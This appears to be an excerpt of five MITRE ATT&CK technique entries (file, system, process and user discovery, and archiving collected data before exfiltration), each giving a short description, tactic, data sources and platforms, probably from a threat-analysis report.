Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre